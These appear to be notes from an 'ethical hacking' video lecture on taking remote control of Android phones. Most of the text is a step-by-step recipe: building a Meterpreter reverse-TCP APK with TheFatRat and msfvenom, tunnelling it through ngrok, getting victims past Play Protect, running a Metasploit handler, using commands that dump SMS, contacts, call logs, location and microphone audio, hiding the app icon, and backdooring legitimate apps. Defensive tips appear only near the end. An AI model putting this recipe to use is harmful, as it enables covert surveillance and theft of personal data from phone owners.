Lecture Notes: Remote Access Exploitation on Android Devices

Introduction

• Importance of cybersecurity and ethical hacking education
• Topic: Remote access exploitation on Android devices
• Warning: Knowledge shared for educational purposes only; unauthorized use is illegal.

Why Android Devices are Attractive Targets

• Over 3 billion active Android devices worldwide
• Android devices store users' entire digital lives: banking, social media, etc.
• Vulnerability due to open nature of Android: installation from unknown sources is allowed.

Trust and Exploitation

• Users often install apps from outside the Play Store
• Malicious apps masquerading as legitimate apps can steal information
  • Access to camera, microphone, messages, passwords, location, photos, and files.

Tools Needed for Demonstration

• TheFatRat: Exploitation framework for creating backdoors and payloads
• ngrok: Tunneling tool to create secure tunnels to localhost.

Setting Up TheFatRat

1. Update system: sudo apt update
2. Upgrade system: sudo apt upgrade
3. Install TheFatRat from Screetsec GitHub repository
   • Clone repository: git clone [repository link]
   • Run installation script: chmod +x setup.sh and ./setup.sh
4. Configure the output folder and enable running from anywhere.

Setting Up ngrok

1. Download ngrok for Linux
2. Run basic command: ngrok http 80
   • Configure account and auth token as prompted.

Creating the Malicious Payload

1. Launch TheFatRat and select "Create backdoor with msfvenom"
2. Choose Android payload:
   • Set LHOST to ngrok TCP address
   • Set LPORT to ngrok's port number
3. Name output file and generate the APK (malicious app).

Transferring the Payload

1. Use Python HTTP server to host APK: python3 -m http.server 90
2. Download APK on target Android device
   • Bypass Play Protect warnings to install.

Setting Up Metasploit Listener

1. Launch Metasploit: msfconsole
2. Configure handler:
   • Use module: use exploit/multi/handler
   • Set payload to android/meterpreter/reverse_tcp
   • Set LHOST and LPORT
3. Open modified malicious app on target device to establish connection.

Demonstration of Capabilities

• Commands available in Meterpreter:
  • sysinfo: Device information
  • webcam_list: List available cameras
  • dump_calllog, dump_contacts, dump_sms: Extract call logs, contacts, messages
  • geolocate: Get device location
  • record_mic: Record audio
  • screenshare: Live screen feed
  • screenshot: Capture screen image
• Malicious app can hide its icon while maintaining functionality.

Advancing the Attack: Backdooring Legitimate Apps

• Select "Backdooring Original APK" in TheFatRat
• Input legitimate APK path for injection
• Use reverse TCP payload to maintain functionality of the legitimate app.

Installing and Signing the Modified APK

1. Download required tools if errors occur (e.g., APKTool version).
2. Modify and recompile APK with injected payload.

Protecting Yourself from These Attacks

1. Never install apps from unknown sources.
2. Heed Google Play Protect warnings.
3. Regularly check installed apps for anomalies.
4. Monitor app permissions closely.
5. Use reliable mobile security solutions.
6. Monitor network connections and battery usage.
7. Use Safe Mode for malware identification.

Conclusion

• Knowledge of these attacks is crucial for defense.
• Ethical responsibility: Do not use this knowledge for malicious purposes.
• Encourage viewers to subscribe for ongoing cybersecurity education.